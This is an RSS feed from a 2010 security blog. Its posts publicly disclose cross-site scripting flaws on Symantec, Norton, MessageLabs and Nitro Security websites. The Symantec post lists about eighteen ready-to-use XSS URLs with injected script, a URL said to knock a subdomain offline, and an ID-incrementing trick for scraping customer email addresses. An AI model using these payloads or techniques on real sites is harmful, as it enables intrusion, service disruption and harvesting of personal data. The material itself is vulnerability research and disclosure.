<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0">

<channel>
	<title>The Test Manager Blog</title>
	
	<link>http://www.thetestmanager.com</link>
	<description>One managers thoughts on Cyber Security &amp; the testing industry.</description>
	<lastBuildDate>Wed, 08 Sep 2010 10:21:25 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=787</generator>
		<atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/TheTestManagersBlog" /><feedburner:info uri="thetestmanagersblog" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><item>
		<title>Protected: XSS Issue in every Ebay Listing</title>
		<link>http://feedproxy.google.com/~r/TheTestManagersBlog/~3/V7zO7nvUSJQ/</link>
		<comments>http://www.thetestmanager.com/blog/2010/09/06/xss-issue-in-every-ebay-listing/#comments</comments>
		<pubDate>Mon, 06 Sep 2010 07:48:21 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.thetestmanager.com/?p=402</guid>
		<description><![CDATA[There is no excerpt because this is a protected post.]]></description>
			<content:encoded><![CDATA[<form action="http://www.thetestmanager.com/blog/wp-pass.php" method="post">
<p>This post is password protected. To view it please enter your password below:</p>
<p><label for="pwbox-402">Password:<br />
<input name="post_password" id="pwbox-402" type="password" size="20" /></label><br />
<input type="submit" name="Submit" value="Submit" /></p></form>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=V7zO7nvUSJQ:cYVmG-2BDNc:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=V7zO7nvUSJQ:cYVmG-2BDNc:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?i=V7zO7nvUSJQ:cYVmG-2BDNc:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=V7zO7nvUSJQ:cYVmG-2BDNc:qj6IDK7rITs"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?d=qj6IDK7rITs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=V7zO7nvUSJQ:cYVmG-2BDNc:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?i=V7zO7nvUSJQ:cYVmG-2BDNc:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/TheTestManagersBlog/~4/V7zO7nvUSJQ" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.thetestmanager.com/blog/2010/09/06/xss-issue-in-every-ebay-listing/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.thetestmanager.com/blog/2010/09/06/xss-issue-in-every-ebay-listing/</feedburner:origLink></item>
		<item>
		<title>Full Disclosure about 20 XSS bugs on Symantec.com and related domains</title>
		<link>http://feedproxy.google.com/~r/TheTestManagersBlog/~3/4oXcG6gFdn4/</link>
		<comments>http://www.thetestmanager.com/blog/2010/09/03/full-disclosure-about-20-xss-bugs-on-symantec-com-and-related-domains/#comments</comments>
		<pubDate>Fri, 03 Sep 2010 22:19:34 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Full Disclosure]]></category>
		<category><![CDATA[Month of Full Disclosure]]></category>
		<category><![CDATA[WebAppSec]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://www.thetestmanager.com/?p=374</guid>
		<description><![CDATA[I have written a new tool called SubFinder (provisional name subject to change). It does exactly as the name suggests. It will find Subdomains on any given host. It will do this via a few methods, first it will look in a couple of obvious places and then it will bruteforce the rest. It will [...]]]></description>
			<content:encoded><![CDATA[<div class="wp-caption alignleft" style="width: 270px"><img title="Symantec" src="http://www.thetestmanager.com/pics/Blog/Symantec.jpg" alt="Symantec" width="260" height="233" /><p class="wp-caption-text">Symantec 20 XSS issues</p></div>
<p>I have written a new tool called SubFinder (provisional name subject to change).</p>
<p>It does exactly as the name suggests. It will find Subdomains on any given host. It will do this via a few methods, first it will look in a couple of obvious places and then it will bruteforce the rest.</p>
<p>It will be released in the next couple of days.</p>
<p>I wanted to test it so I ran it against <a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://www.Symantec.com" title="Symantec.com"  target="_blank">Symantec.com</a></p>
<p>I got over 200 subdomains found. (not all could be browsed, but loads were)</p>
<p>From the domain list I thought i would check some of them over for XSS issues. The reason that you will find more issues is because firstly these sub domains are usually used to host mini sites, or sub sites. When/If there is a code review then these can be missed.</p>
<p>Also SubDomains are more often than not coded by outsourced suppliers so even if Symantec had great processes in place (which they don&#8217;t) , there is a chance that the outsourced suppliers do not.</p>
<p>(1) <a target="_blank" href="http://www.thetestmanager.com/blog/goto/https://symantecenterprise.rsys3.net/servlet/campaignrespondent?FIRSTNAME=qq&amp;LASTNAME=qqqq&amp;COMPANY=qqqq&amp;JOBTITLE=Vice+President&amp;ADDRESS1=qqqq&amp;ADDRESS2=qqqq&amp;CITY=qqqq&amp;STATEPROVINCE=AK&amp;COUNTRY=United+States+of+America&amp;POSTALCODE=90210&amp;PHONENUMBER=999&amp;EMAIL=qqqq%40aaa&amp;COMPANYSIZE=1+to+10&amp;QUESTION=ttm&lt;/textarea&gt; &lt;br /&gt;&lt;script&gt;alert(%27The TestManager SymanTec Xss SubFinderTest%27)&lt;/script&gt;&amp;button=Submit&amp;_RequiredFields_=FIRSTNAME%2CLASTNAME%2CCOMPANY%2CJOBTITLE%2CADDRESS1%2CCITY%2CSTATEPROVINCE%2CCOUNTRY%2CPOSTALCODE%2CPHONENUMBER%2CEMAIL%2CCOMPANYSIZE&amp;_EMailFields_=EMAIL&amp;_RealFields_=&amp;_IntegerFields_=&amp;_BannedFields_=TRUE&amp;_ID_=symc.2114.-2&amp;Campaign_=JK_Form_RequestSalesCall_MASTER&amp;charset_=UTF-8&amp;_InlineResponseRule_=true&amp;_Sent_=2010-08-23+16%3A19%3A41.610&amp;ACTIVITYCODE=92078&amp;EMail_=92078&amp;__HIDDEN_FIELD_NAMES__=_RequiredFields_%3B_EMailFields_%3B_RealFields_%3B_IntegerFields_%3B_BannedFields_%3B_ID_%3BCampaign_%3Bcharset_%3B_InlineResponseRule_%3B_Sent_%3BACTIVITYCODE%3BEMail_%3B__HIDDEN_FIELD_NAMES__" title="symantecenterprise XSS"  target="_blank">symantecenterprise XSS </a></p>
<p>(2) <a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://www.symantec.com/connect/search?filters=ttm--&quot;&lt;/script&gt;&lt;script&gt;alert(String.fromCharCode(84,104,101,32,84,101,115,116,77,97,110,97,103,101,114,32,83,121,109,97,110,84,101,99))&lt;/script&gt;" title="Symantec Connect Search"  target="_blank">Symantec Connect Search Feature XSS</a> (May only work in IE?)</p>
<p>(3) <a target="_blank" href="http://www.thetestmanager.com/blog/goto/https://et.symantec.com/signup/thanks.html?fn=ttm&lt;/div&gt;&lt;script&gt;alert(%27The TestManager SymanTec Xss SubFinderTest%27)&lt;/script&gt;&amp;em=aaaa@aaa.c" title="ET.Symantec XSS"  target="_blank">https://et.symantec.com XSS</a></p>
<p>(4) <a title="MailList Symantec XSS" href="http://maillist.entsupport.symantec.com/subscribe.asp?ddProduct=18d4ttm--&quot;&gt;&lt;/form&gt;&lt;script&gt;alert('The Test Manager.com Sub Finder Symantec Test')&lt;/script&gt;&amp;EmailAddress=&amp;password=" target="_blank">http://maillist.entsupport.symantec.com XSS<br />
</a><br />
(5) Bit of a strnge one this, if you go to <a title="RenewalCentre" href="https://renewalcenter.symantec.com/storefront/app/storefront.jsp?action=transferReloadCheckAccount&amp;_requestid=194899" target="_blank">https://renewalcenter.symantec.com/<br />
</a>and into the email  box type<br />
&#8220;&gt;&lt;&lt;/div&gt;&lt;script&gt;alert(&#8216;The TestManager SymanTec Xss SubFinderTest&#8217;)&lt;/script&gt;<br />
you should get an error which states invalid email address entered.<br />
Now change the URL to<br />
<a target="_blank" href="http://www.thetestmanager.com/blog/goto/https://renewalcenter.symantec.com/storefront/app//storefront.jsp?action=transferReloadLogin&amp;success=yes&amp;_requestid=185580" title="Stored Symantec?"  target="_blank">https://renewalcenter.symantec.com</a><br />
and Bingo XSS (is it being stored? making it a sotred XSS<br />
I don&#8217;t think so but not 100% sure)</p>
<p>(6) <a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://bit.ly/dxBAY4" title="Symantec Knowledge Centre XSS"  target="_blank">http://www.symantec.com/ XSS</a> (IE browsers only?)</p>
<p>(7) open redirect to XSS &#8211; <a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://www.messagelabs.co.uk/resources/blog.aspx?link=javascript:alert(%27The Test Manager Sub Finder Symantec XSS Test%27)" title="MessageLabs Redirect XSS"  target="_blank">http://www.messagelabs.co.uk/ XSS</a> -<br />
Seems to only work in Firefox?, and not in IE?</p>
<p>(8) <a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://bit.ly/c30JUN" title="Connect Forward XSS Symantec"  target="_blank">http://www.symantec.com/ Connect Forward XSS</a><br />
IE only?</p>
<p>(9) <a title="Other Possible Sites." href="https://symantecevents.verite.com/?action=event.dsp_cancel&amp;event_id=17895&amp;error=ttm--%3C/div%3E%3Cscript%3Ealert%28String.fromCharCode%2884,104,101,32,84,101,115,116,77,97,110,97,103,101,114,32,83,121,109,97,110,84,101,99,32,88,115,115,32,83,117,98,70,105,110,100,101,114,32,84,101,115,116%29%29%3C/script%3Etest" target="_blank">https://symantecevents XSS<br />
</a>Site development on the above seems to have outsourced to<br />
<a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://verite.com/our-work/by-client/client-focus/?client_id=2" title="Other Possible Sites."  target="_blank">http://verite.com/our-work/by-client/client-focus/?client_id=2</a><br />
I&#8217;m guessing all of their sites for symantec would be easy targets.</p>
<p>(10) <a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://seer.entsupport.symantec.com/email_forms/sendmail.asp?ddProduct=&amp;SrvURL=&amp;type=10&amp;strName=a&amp;strEmail=ttm--%3C/p%3E%3Cscript%3Ealert%28%22TheTestManager%20Sub%20Finder%20Symantec%20test%22%29%3C/script%  3E&amp;topic=symantec&amp;strBODY=aaa&amp;submit2=Send" title="Seer Symantec XSS"  target="_blank">http://seer.entsupport.symantec.com/ XSS</a></p>
<p>(11) <a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://bit.ly/c2fYL7" title="AKA Community Symantec XSS"  target="_blank">http://aka-community.symantec.com</a></p>
<p>(12) <a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://bit.ly/bMEREs" title="Careers Symantec XSS"  target="_blank">https://careers.symantec.com/ XSS </a> (may need to visit page twice as the<br />
first time sets the cookie)</p>
<p>(13) <a target="_blank" href="http://www.thetestmanager.com/blog/goto/https://chat.symantec.com/sdcxuser/lachat/user/reentry.asp?email=ttm--%22&gt;&lt;script&gt;alert(%27XSS TEST%27)&lt;/script&gt;&amp;lg=en&amp;noqcode=" title="Chat Symantec XSS"  target="_blank">https://chat.symantec.com XSS</a></p>
<p>(15) <a target="_blank" href="http://www.thetestmanager.com/blog/goto/https://www4.symantec.com/Vrt/vrtcontroller?EMAIL=ttm--%22&gt;&lt;script&gt;alert(%27The Test Manager Subfinder Xss   Symantec%27)&lt;/script&gt;&amp;PASSWD=a&amp;CONFIRM_PASSWD=a&amp;a_id=48182&amp;s_id=70&amp;p_id=null&amp;COMMAND_DESTINATION_URL=null&amp;REDIRECT_PAGE=null&amp;p_locale=en_US&amp;l_id=&amp;article_title=Results&amp;t_id=62243672&amp;t_s=1283128779469&amp;EMAIL_AS_  USER_FLAG=Y&amp;FRM_ACTION=Create+Account&amp;ru=null" title="WWW4 Symantec XSS"  target="_blank">https://www4.symantec.com/ XSS</a></p>
<p>(16) <a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://seer.entsupport.symantec.com/nav_bar/side_nav.asp?ddProduct=ttm%22%3E%3Cscript%3Ealert%28%27The%20Test%20Manager%20Sub%20Finder%20Xss%20symantec%20Test%27%29%3C/script%3E" title="NavBar Symantec XSS"  target="_blank">http://seer.entsupport.symantec.com/ Navbar XSS</a></p>
<p>(17) Ouch Denial Of Service (DOS) via Bad Param Injection =<br />
<a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://techcenter.symantec.com" title="Tech Center Symantec Home"  target="_blank">http://techcenter.symantec.com</a> redirect to <a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://techcenter.symantec.com/ecampus/enterprise" title="Tech Center Symantec Enterprise"  target="_blank">http://techcenter.symantec.com/ecampus/enterprise</a> =<br />
which works fine as do all other URLs on this techcenter subdomain.<br />
However if I now use the url =<br />
<a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://techcenter.symantec.com/ecampus/enterprise" title="Symantec Denial of Service TechCenter"  target="_blank">http://techcenter.symantec.com/ecampus/enterprise?cat=null&amp;cmd=sc&amp;courseNo=DP6000&amp;EXValue=null&amp;file=null&amp;module&amp;page=null&amp;siteName=sena&amp;type=g_</a><br />
Then every url on that subdomain gets blown and the server responds with a http 500server error. This creates a Denial of Service on that Subdomain.</p>
<p>(18) <a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://cybercrimenews.norton.com/cgi-bin/search.cgi?target=ttm--%22&gt;&lt;script&gt;alert(%27The Test Manager XSS Sub Finder Tool Test%27)&lt;/script&gt;&amp;rule=any&amp;page=2" title="Norton Cybercrime XSS"  target="_blank">http://cybercrimenews.norton.com XSS</a></p>
<p>(19) <span class="status-body"><span class="status-content"><span class="entry-content">Every Symantec customer email address can be grabbed = <a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://bit.ly/91fZrT" class="tweet-url web" rel="nofollow"  target="_blank">http://bit.ly/91fZrT</a> just change the id. you could start at 1 and work your way up. This is very easy to automate. looks like over 16 million potential email addresses?.</span></span></span></p>
<div id="_mcePaste" style="position: absolute; left: -10000px; top: 170px; width: 1px; height: 1px; overflow: hidden;">(1)</p>
<p>https://symantecenterprise.rsys3.net/servlet/campaignrespondent?FIRSTNAME=qq&amp;LASTNAME=qqqq&amp;COMPANY=qqqq&amp;JOBTITLE=Vice+President&amp;ADDRESS1=qqqq&amp;ADDRESS2=qqqq&amp;CITY=qqqq&amp;STATEPROVINCE=AK&amp;COUNTRY=United+States+of</p>
<p>+America&amp;POSTALCODE=90210&amp;PHONENUMBER=999&amp;EMAIL=qqqq%40aaa&amp;COMPANYSIZE=1+to+10&amp;QUESTION=0659ttm&lt;/textarea&gt; &lt;br /&gt;&lt;script&gt;alert(&#8216;The TestManager SymanTec Xss SubFinder</p>
<p>Test&#8217;)&lt;/script&gt;&amp;button=Submit&amp;_RequiredFields_=FIRSTNAME%2CLASTNAME%2CCOMPANY%2CJOBTITLE%2CADDRESS1%2CCITY%2CSTATEPROVINCE%2CCOUNTRY%2CPOSTALCODE%2CPHONENUMBER%2CEMAIL%2CCOMPANYSIZE&amp;_EMailFields_=EMAIL&amp;_Real</p>
<p>Fields_=&amp;_IntegerFields_=&amp;_BannedFields_=TRUE&amp;_ID_=symc.2114.-2&amp;Campaign_=JK_Form_RequestSalesCall_MASTER&amp;charset_=UTF-8&amp;_InlineResponseRule_=true&amp;_Sent_=2010-08-23+16%3A19%3A41.610&amp;ACTIVITYCODE=92078&amp;EMail_</p>
<p>=92078&amp;__HIDDEN_FIELD_NAMES__=_RequiredFields_%3B_EMailFields_%3B_RealFields_%3B_IntegerFields_%3B_BannedFields_%3B_ID_%3BCampaign_%3Bcharset_%3B_InlineResponseRule_%3B_Sent_%3BACTIVITYCODE%3BEMail_%3B__HIDD</p>
<p>EN_FIELD_NAMES__</p>
<p>(2)</p>
<p>http://www.symantec.com/connect/search?filters=01a1ttm&#8211;&#8221;);&lt;/script&gt;&lt;script&gt;alert(String.fromCharCode(84,104,101,32,84,101,115,116,77,97,110,97,103,101,114,32,83,121,109,97,110,84,101,99,32,88,115,115,32,83,</p>
<p>117,98,70,105,110,100,101,114,32,84,101,115,116))&lt;/script&gt;</p>
<p>(3) https://et.symantec.com/signup/thanks.html?fn=ttm&lt;/div&gt;&lt;script&gt;alert(&#8216;The TestManager SymanTec Xss SubFinderTest&#8217;)&lt;/script&gt;&amp;em=aaaa@aaa.c</p>
<p>(4) http://maillist.entsupport.symantec.com/subscribe.asp?ddProduct=18d4ttm&#8211;&#8221;&gt;&lt;/form&gt;&lt;script&gt;alert(&#8216;The Test Manager.com Sub Finder Symantec Test&#8217;)&lt;/script&gt;&amp;EmailAddress=&amp;password=</p>
<p>(5) Bit of a strnge one this, if you go to https://renewalcenter.symantec.com/storefront/app/storefront.jsp?action=transferReloadCheckAccount&amp;_requestid=99999<br />
and into the email  box type<br />
&#8220;&gt;&lt;&lt;/div&gt;&lt;script&gt;alert(&#8216;The TestManager SymanTec Xss SubFinderTest&#8217;)&lt;/script&gt;<br />
you should get an error which states invalid email address entered.<br />
Now change the URL to</p>
<p>https://renewalcenter.symantec.com/storefront/app//storefront.jsp?action=transferReloadLogin&amp;success=yes&amp;_requestid=99999</p>
<p>and Bingo XSS (is it being stored? making it a sotred XSS &#8211; I don&#8217;t think so but not 100% sure)</p>
<p>(6) http://www.symantec.com/business/support/knowledge_base_results.jsp?SearchTerm=ttm&#8221;/&gt;&lt;script&gt;alert(&#8216;The TestManager SymanTec Xss SubFinderTest&#8217;)&lt;/script&gt;&amp;ddProduct=&amp;pid=&amp;content=all</p>
<p>(7) open redirect to XSS &#8211; http://www.messagelabs.co.uk/resources/blog.aspx?link=javascript:alert(&#8216;The Test Manager Sub Finder Symantec XSS Test&#8217;) &#8211; Seems to only work in Firefox? , and not in IE?</p>
<p>(8) http://www.symantec.com/connect/forward?path=2e6fttm&#8211;&#8221;);&lt;/script&gt;&lt;script&gt;alert(&#8216;The Test Manager XSS Test for Sub FInder&#8217;)&lt;/script&gt;</p>
<p>(9)</p>
<p>https://symantecevents.verite.com/?action=main.dsp_register&amp;error=42f2ttm&#8211;&lt;/div&gt;&lt;script&gt;alert(String.fromCharCode(84,104,101,32,84,101,115,116,77,97,110,97,103,101,114,32,83,121,109,97,110,84,101,99,32,88,1</p>
<p>15,115,32,83,117,98,70,105,110,100,101,114,32,84,101,115,116))&lt;/script&gt;<br />
Site development on the above seems to have outsourced to http://verite.com/our-work/by-client/client-focus/?client_id=2&amp; &#8211; I&#8217;m guessing all of their sites for symantec would be easy targets.</p>
<p>(10)</p>
<p>http://seer.entsupport.symantec.com/email_forms/sendmail.asp?ddProduct=&amp;SrvURL=&amp;type=10&amp;strName=a&amp;strEmail=ttm&#8211;%3C/p%3E%3Cscript%3Ealert%28%22TheTestManager%20Sub%20Finder%20Symantec%20test%22%29%3C/script%</p>
<p>3E&amp;topic=symantec&amp;strBODY=aaa&amp;submit2=Send</p>
<p>(11)</p>
<p>https://symantecevents.verite.com/?action=event.dsp_cancel&amp;event_id=17895&amp;error=ttm&#8211;&lt;/div&gt;&lt;script&gt;alert(String.fromCharCode(84,104,101,32,84,101,115,116,77,97,110,97,103,101,114,32,83,121,109,97,110,84,101,</p>
<p>99,32,88,115,115,32,83,117,98,70,105,110,100,101,114,32,84,101,115,116))&lt;/script&gt;test</p>
<p>(12) http://aka-community.symantec.com/lib/jsp/socialbookmarkingjs.jsp?lg=en&amp;ct=us&amp;segment=ttm&#8211;&#8221;);&lt;/script&gt;&lt;script&gt;alert(&#8216;The Test Manager Xss Test using Sub Finder on Symantec&#8217;)&lt;/script&gt;</p>
<p>(13) https://careers.symantec.com/psc/jobs/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL?4210ttm&#8211;&#8221;;&lt;/script&gt;&lt;script&gt;alert(&#8216;the test manager xss test of sub finder on Symantec&#8217;)&lt;/script&gt;test&amp; (may need to visit page</p>
<p>twice as the first time sets the cookie)</p>
<p>(14) https://chat.symantec.com/sdcxuser/lachat/user/reentry.asp?email=05edttm&#8211;&#8221;&gt;&lt;script&gt;alert(&#8216;XSS TEST&#8217;)&lt;/script&gt;&amp;lg=en&amp;noqcode=</p>
<p>(15) https://www4.symantec.com/Vrt/vrtcontroller?EMAIL=0d07ttm&#8211;&#8221;&gt;&lt;script&gt;alert(&#8216;The Test Manager Subfinder Xss</p>
<p>Symantec&#8217;)&lt;/script&gt;&amp;PASSWD=a&amp;CONFIRM_PASSWD=a&amp;a_id=48182&amp;s_id=70&amp;p_id=null&amp;COMMAND_DESTINATION_URL=null&amp;REDIRECT_PAGE=null&amp;p_locale=en_US&amp;l_id=&amp;article_title=Results&amp;t_id=62243672&amp;t_s=1283128779469&amp;EMAIL_AS_</p>
<p>USER_FLAG=Y&amp;FRM_ACTION=Create+Account&amp;ru=null</p>
<p>(16) http://seer.entsupport.symantec.com/nav_bar/side_nav.asp?ddProduct=ttm%22%3E%3Cscript%3Ealert%28%27The%20Test%20Manager%20Sub%20Finder%20Xss%20symantec%20Test%27%29%3C/script%3E</p>
<p>(17) Ouch DOS via Bad Param Injection = http://techcenter.symantec.com redirect to http://techcenter.symantec.com/ecampus/enterprise = which works fine as do all other URLs on this techcenter subdomain.<br />
However if I now use the url = http://techcenter.symantec.com/ecampus/enterprise?cat=null&amp;cmd=sc&amp;courseNo=DP6000&amp;EXValue=null&amp;file=null&amp;module&amp;page=null&amp;siteName=sena&amp;type=g_<br />
Then every url on that subdomain gets blown and the server responds with a http 500server error. This creates a Denial of Service on that Subdomain.</p>
<p>(18) http://cybercrimenews.norton.com/cgi-bin/search.cgi?target=1f10ttm&#8211;&#8221;&gt;&lt;script&gt;alert(&#8216;The Test Manager XSS Sub Finder Tool Test&#8217;)&lt;/script&gt;&amp;rule=any&amp;page=2</p>
</div>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=4oXcG6gFdn4:w-uCbPzSBPs:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=4oXcG6gFdn4:w-uCbPzSBPs:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?i=4oXcG6gFdn4:w-uCbPzSBPs:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=4oXcG6gFdn4:w-uCbPzSBPs:qj6IDK7rITs"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?d=qj6IDK7rITs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=4oXcG6gFdn4:w-uCbPzSBPs:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?i=4oXcG6gFdn4:w-uCbPzSBPs:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/TheTestManagersBlog/~4/4oXcG6gFdn4" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.thetestmanager.com/blog/2010/09/03/full-disclosure-about-20-xss-bugs-on-symantec-com-and-related-domains/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		<feedburner:origLink>http://www.thetestmanager.com/blog/2010/09/03/full-disclosure-about-20-xss-bugs-on-symantec-com-and-related-domains/</feedburner:origLink></item>
		<item>
		<title>Full Disclosure – XSS Issue on Nitro Security Site.</title>
		<link>http://feedproxy.google.com/~r/TheTestManagersBlog/~3/IBLtJC8f8ew/</link>
		<comments>http://www.thetestmanager.com/blog/2010/08/12/full-disclosure-xss-issue-on-nitro-security-site/#comments</comments>
		<pubDate>Thu, 12 Aug 2010 11:59:30 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Full Disclosure]]></category>
		<category><![CDATA[Month of Full Disclosure]]></category>
		<category><![CDATA[WebAppSec]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://www.thetestmanager.com/?p=367</guid>
		<description><![CDATA[Again we come with another (XSS) Cross Site Scripting Bugs on another Security Site. This time it is on the site of Nitro Security Now what I find a little bit strange is that Nitro Security states that it has created and sells 3 products which can detect Cross Site Scripting issues on websites. The [...]]]></description>
			<content:encoded><![CDATA[<div class="wp-caption alignleft" style="width: 401px"><img title="Nitro Security XSS" src="http://www.thetestmanager.com/pics/Blog/Asci_TTM.png" alt="Nitro Security XSS" width="391" height="135" /><p class="wp-caption-text">Nitro Security XSS</p></div>
<p>Again we come with another (XSS) Cross Site Scripting Bugs on another Security Site.</p>
<p>This time it is on the site of <a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://nitrosecurity.com" title="Nitro Security"  target="_blank">Nitro Security</a></p>
<p>Now what I find a little bit strange is that Nitro Security states that it has created and sells 3 products which can detect Cross Site Scripting issues on websites.</p>
<p>The issue on there site has been there for a while and one would have thoguht that the company would have run its own tools against its won site to make sure that all is secure.</p>
<p>Unlike other security sites such as Tennable / Nessus etc on Nitro there is no attempt made to protect the site from user created data injections.</p>
<p>And with that I give you <a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://nitrosecurity.com/LOGIN?destination=ttm%22%3E%3C/a%3E%3C/form%3E%3C/script%3E%3Cscript%3Ealert%28%27TheTestManager.com%20Month%20of%20Full%20Disclosure%20Bugs%27%29%3C/script%3E%3Ciframe%20src%20=%22http://www.thetestmanager.com%22%20width=%22800%22%20height=%22800%22%3E%3C/iframe%3E&amp;src=&amp;credential_0=aaa%40aaa.com&amp;registered=yes&amp;credential_1=xxxxx&amp;cmd=Sign+In" title="Nitro Security Xss"  target="_blank">Nitro Security XSS Issue. </a></p>
<div class="wp-caption alignnone" style="width: 602px"><img class=" " title="Nitro Security XSS" src="http://www.thetestmanager.com/pics/Blog/Nitro Xss.png" alt="Nitro Security XSS" width="592" height="426" /><p class="wp-caption-text">Nitro Security XSS</p></div>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=IBLtJC8f8ew:EKkwKv0i9d8:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=IBLtJC8f8ew:EKkwKv0i9d8:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?i=IBLtJC8f8ew:EKkwKv0i9d8:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=IBLtJC8f8ew:EKkwKv0i9d8:qj6IDK7rITs"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?d=qj6IDK7rITs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/TheTestManagersBlog?a=IBLtJC8f8ew:EKkwKv0i9d8:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/TheTestManagersBlog?i=IBLtJC8f8ew:EKkwKv0i9d8:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/TheTestManagersBlog/~4/IBLtJC8f8ew" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.thetestmanager.com/blog/2010/08/12/full-disclosure-xss-issue-on-nitro-security-site/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.thetestmanager.com/blog/2010/08/12/full-disclosure-xss-issue-on-nitro-security-site/</feedburner:origLink></item>
		<item>
		<title>Full Disclosure – Nessus Website Vulnerable to XSS</title>
		<link>http://feedproxy.google.com/~r/TheTestManagersBlog/~3/WHamykkY6CY/</link>
		<comments>http://www.thetestmanager.com/blog/2010/08/11/full-disclosure-%e2%80%93-nessus-website-vulnerable-to-xss/#comments</comments>
		<pubDate>Wed, 11 Aug 2010 12:38:38 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Full Disclosure]]></category>
		<category><![CDATA[Month of Full Disclosure]]></category>
		<category><![CDATA[WebAppSec]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://www.thetestmanager.com/?p=365</guid>
		<description><![CDATA[Nessus is a product owned now by Tenable Network Security. I had originally decided to do a month of Security Site Bugs as most security sites have a higher level of site protection and also they are more of a challenge for a researcher / tester to find bugs on, and lets face it a [...]]]></description>
			<content:encoded><![CDATA[<div class="wp-caption alignleft" style="width: 401px"><img title="The Test Manager Nessus XSS" src="http://www.thetestmanager.com/pics/Blog/Asci_TTM.png" alt="The Test Manager Nessus XSS" width="391" height="135" /><p class="wp-caption-text">The Test Manager Nessus Cross Site Scripting Error</p></div>
<p>Nessus is a product owned now by <a target="_blank" href="http://www.thetestmanager.com/blog/goto/http://www.nessus.org/nessus/" title="Tenable"  target="_blank">Tenable Network Security.</a></p>
